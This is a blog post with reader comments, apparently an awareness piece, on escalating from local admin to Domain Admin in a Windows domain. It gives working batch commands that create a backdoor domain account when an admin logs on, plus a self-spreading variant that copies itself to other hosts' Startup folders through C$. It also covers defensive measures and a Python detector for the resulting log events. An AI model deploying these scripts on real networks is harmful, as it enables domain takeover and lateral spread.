How to turn a Local Admin account into a Domain Admin account

I could have easily called this article "How to hack and take control of an entire Windows network", but that would draw a lot of negative attention, and it probably should. Let's start off with a little background on the terminology for those who don't know much about Windows networking. (You can skip to the next section otherwise.)

"Domain Admins" is the security group whose members have administrator rights on every machine that is a member of the domain. A domain is like a workgroup of computers that are under the control of an Active Directory domain controller. If you're not in the domain you don't have access to much. We're going to change that, by gaining this level of access. There are two basic types of users: Administrators and Users. Users aren't allowed to do very much: they can't install software, change system settings, etc. Administrators have total control. Local administrators have control of that one computer only. Domain Administrators have control over all PCs that are part of the domain. In particular they have access to the administrative root share, C$, which exists by default on every Windows Professional (and server) PC. If you can become a Domain Admin, you can access every file on every computer through this share!

Now, many legacy applications fail to run as a simple user, so it's common practice to make a "User" a "Local Admin" of their own computer. That means the user can add printers and add or remove software on their own PC. This way the PC is still managed, but the user has more freedom to blow up their computer doing awesome stunts like deleting C:\Windows\System32 to save space. "But I don't use that, so I thought it was OK to delete..." If you can grasp all that, I'll go ahead into the description of how you elevate from "Local Admin" to "Domain Admin".

How do I turn my local admin into a Domain Admin?

OK, this is where I'm going to scare you a bit. It's easy: you don't need any tools or any expert know-how. You only need to type these two lines into a batch file!

rem Create the account in the domain, then add it to Domain Admins.
rem Both commands run with the rights of whoever executes the batch file.
net user dirtyhackor mysecretpass /add /domain
net group "Domain Admins" dirtyhackor /add /domain

Have No Fear

The first line creates a new user on the domain named dirtyhackor, and the second line adds that user to the Domain Admins group. The masters of Windows domains may be laughing right now, because they know this script won't fly as is. Both commands run with the rights of whoever executes them, an ordinary user has no right to create domain accounts, and all they will get is "System error 5 has occurred. Access is denied." And Mr. Admin, you are too sly to run a batch script without reading it first, right? Well, how about these apples: place the script in the All Users Startup folder (under Start Menu > Programs) on this computer. Everything in that folder runs at every interactive logon, as the user who is logging on. So when the domain admin walks by to fix your computer and logs in, they unknowingly run this script with their own domain admin rights, and voila! Now there is a secretly created user called "dirtyhackor" on the domain with full access to everything! (The only visible tell is the console window the batch file opens for a moment at logon; the admin would have to notice it and go looking in the Startup folder.)

But how do you get a domain admin to log on to your computer? A little sabotage will usually get a member of Domain Admins to sign in to your (target) computer. Many users also log on to several computers. What if you wanted to get your newly created batch script onto all of the computers you are a local admin of? Just one more line of batch will let us spread the script to other computers over the network!

rem Same two lines as before; they only succeed when a domain admin runs them.
net user dirtyhackor mysecretpass /add /domain
net group "Domain Admins" dirtyhackor /add /domain
rem For every host "net view" lists, copy this script (%~f0 is its own full path)
rem into that host's All Users Startup folder via C$; succeeds only where the
rem logged-on user is a local admin there. Windows XP/2003 path shown.
for /F %%i in ('net view') do copy /Y "%~f0" "%%i\c$\documents and settings\all users\start menu\programs\startup\"

As you can see, the first two lines are the same as in the previous example. The third line runs net view to list the PCs on the local network and, for each one, tries to copy this script into that computer's All Users Startup folder through its C$ share. The copy only succeeds on machines where the currently logged-on user is a local admin (the header lines of net view's output produce a few failed copies, which is harmless). The path shown is the Windows XP/2003 one; on Vista and later the folder is \ProgramData\Microsoft\Windows\Start Menu\Programs\Startup. So let's say three people work at the one workstation. Sam logs in, and this spreads to all computers he has access to. Then Sally logs in and it spreads to all of her workstations, followed by Steve. If they each have access to three computers, counting the shared one, that's 7 computers with the script on them now. Then if anyone uses those computers... the pattern of spreading continues throughout the network! Eventually a domain admin will run the script and you're in!

Ramifications

What can you do with this power? Install software on any PC, remotely: keyloggers, spam relays, web servers, game servers, backup storage, anything you would want to. So if you're a network admin (like me), you're probably thinking hard about all the times you've logged in to a workstation! So what can you do against this threat? Being aware of this type of trickery is a start, and second, assign Domain Admin to as few people as possible. Beyond that, the controls that actually break the trick are: never log on to a workstation with a Domain Admin account (give support staff a separate, non-privileged account for desktop work, and use the Group Policy user rights "Deny log on locally" and "Deny log on through Remote Desktop Services" to keep Domain Admins off workstation OUs), and alert on the two Security log events this script leaves on the domain controller: 4720 (a user account was created) followed seconds later by 4728 (a member was added to a security-enabled global group) for Domain Admins. Those are the Windows Server 2008 and later IDs; older domain controllers log 624 and 632 for the same events.
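The domain controller records the script's two actions as Security log events 4720 (user account created) and 4728 (member added to a security-enabled global group). Correlating the two is the cheapest detection for this trick. The following Python is an added example for this article, not code from the original post: it runs over constructed Security log records (the field names are an assumed flattening of the event XML, and the sample records are made up, not captured from a real domain) and raises a medium-severity alert for any addition to a watched group, upgraded to high when the added account was created by the same person moments earlier, which is exactly what the batch file does when a domain admin logs on.

```python
"""Flag the 'create a domain account, then add it to Domain Admins' chain
in Windows Security log records.

Added example, not code from the original post. SAMPLE_EVENTS is constructed
for illustration; the field names are an assumed SIEM flattening of the
event XML, not a real export format.
"""
from datetime import datetime, timedelta

# Windows Security log event IDs (Server 2008 and later):
#   4720  a user account was created
#   4728  a member was added to a security-enabled global group
#         (Domain Admins is a global group, so this is the ID that
#         "net group ... /add /domain" produces; Builtin\Administrators,
#         a domain local group, would log 4732 instead)
USER_CREATED = 4720
ADDED_TO_GLOBAL_GROUP = 4728

# Global groups whose membership changes always deserve a look.
WATCHED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins"}

# Constructed sample records (assumed flattening; not real data).
SAMPLE_EVENTS = [
    # a domain admin logs on interactively at a workstation: noise for us
    {"time": "2010-10-10T18:01:10", "id": 4624, "subject": "CORP\\jsmith",
     "target": "WS-ACCT-07", "group": None},
    # the startup-folder batch file runs under that admin's account
    {"time": "2010-10-10T18:01:12", "id": 4720, "subject": "CORP\\jsmith",
     "target": "dirtyhackor", "group": None},
    {"time": "2010-10-10T18:01:13", "id": 4728, "subject": "CORP\\jsmith",
     "target": "dirtyhackor", "group": "Domain Admins"},
    # next day, helpdesk creates a service account and puts it in an
    # unprivileged global group: must not alert
    {"time": "2010-10-11T09:30:00", "id": 4720, "subject": "CORP\\helpdesk",
     "target": "svc-backup", "group": None},
    {"time": "2010-10-11T09:31:00", "id": 4728, "subject": "CORP\\helpdesk",
     "target": "svc-backup", "group": "Backup Staff"},
    # an existing account is promoted: worth a ticket, but not the worm shape
    {"time": "2010-10-12T14:00:00", "id": 4728, "subject": "CORP\\admin.bob",
     "target": "admin.alice", "group": "Domain Admins"},
]


def find_privilege_chains(events, window=timedelta(minutes=10)):
    """Return one alert dict per addition to a watched group.

    Severity is "high" when the member account was created by the same
    subject within `window` before the addition (the shape the article's
    batch file produces), otherwise "medium".
    """
    created = {}   # lower-cased account name -> (subject, creation time)
    alerts = []
    # ISO-8601 timestamps sort correctly as strings
    for e in sorted(events, key=lambda rec: rec["time"]):
        when = datetime.fromisoformat(e["time"])
        if e["id"] == USER_CREATED:
            created[e["target"].lower()] = (e["subject"], when)
        elif e["id"] == ADDED_TO_GLOBAL_GROUP and e["group"] in WATCHED_GROUPS:
            alert = {"severity": "medium", "time": e["time"],
                     "subject": e["subject"], "member": e["target"],
                     "group": e["group"]}
            hit = created.get(e["target"].lower())
            if hit is not None:
                creator, ctime = hit
                age = when - ctime
                if creator == e["subject"] and timedelta(0) <= age <= window:
                    alert["severity"] = "high"
                    alert["created_seconds_before"] = age.total_seconds()
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in find_privilege_chains(SAMPLE_EVENTS):
        print(f'{a["time"]} {a["severity"]:6} {a["subject"]} added '
              f'{a["member"]} to {a["group"]}')
```

Run against the sample data this prints two alerts: a high one for dirtyhackor (created one second before the Domain Admins addition, by the same logged-on admin) and a medium one for admin.alice. The ten-minute window is deliberately generous; the batch file does both steps within a second, but a human who creates an account and promotes it in the same sitting is worth the same question.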

Spread the word! E-mail this to someone who you know needs to be aware of this, and please stumble or dig this, as that will really help get the word out! Thanks for reading!!! +Green

  1. harryoui November 19, 2015 at 11:10 am

    Hey Jason,

    Wouldn't this idea make a prompt for UAC every time the computer starts up, making it likely for an Administrator to simply press 'No', and also to perhaps check the file directory and remove the file?

    • harryoui November 19, 2015 at 11:17 am

      Not to mention you would have to make the script run as admin so as not to get an Access Denied reply.

  2. callum August 30, 2011 at 6:30 pm

    So if I copy the first two lines into a batch and put it in the All Users > Startup folder, it will run when the domain admin logs in?

    net user /domain /add dirtyhackor mysecretpass
    net group /domain "Domain Admins" /add dirtyhackor

    Do I have to replace /domain with my actual domain?

    • +Jason September 12, 2011 at 8:06 am

      No, in this case /domain and /add tell the program "net user" to add dirtyhackor to the domain (that you are authenticated on).

  3. Tyler August 23, 2011 at 7:32 am

    I have a question: is there a way to use a .bat to do this same thing but spread an .exe to all the other startup folders on a domain?

  4. Jason February 15, 2011 at 9:12 am

    Why would access to the startup folder be denied to an admin account?

  5. mojodo October 10, 2010 at 6:10 pm

    Unless I am a responsible admin and lock down the ability to add users to the domain admin group through policy.

    • Jason February 15, 2011 at 9:11 am

      mojodo, I looked into this, and how can you do that from Group Policy?
      I don't even see an obvious way to make that happen.

    • Jason October 10, 2010 at 6:53 pm

      True, that's one way to do it. Now how many actually do, I wonder? I know of at least 12 small to medium businesses where the guy who is "good at computers" is the admin of their network.

      One of them has over 100 workstations. If you're a "roaming" tech like I was, you'd know how many are out there. I also have it on good authority that a specific large credit company is also set up this way.

      But in short, mojodo is absolutely right; how many do it, though, that is what I ask.

      • Tom February 14, 2011 at 12:29 pm

        Another problem is if access to the startup folder is denied.
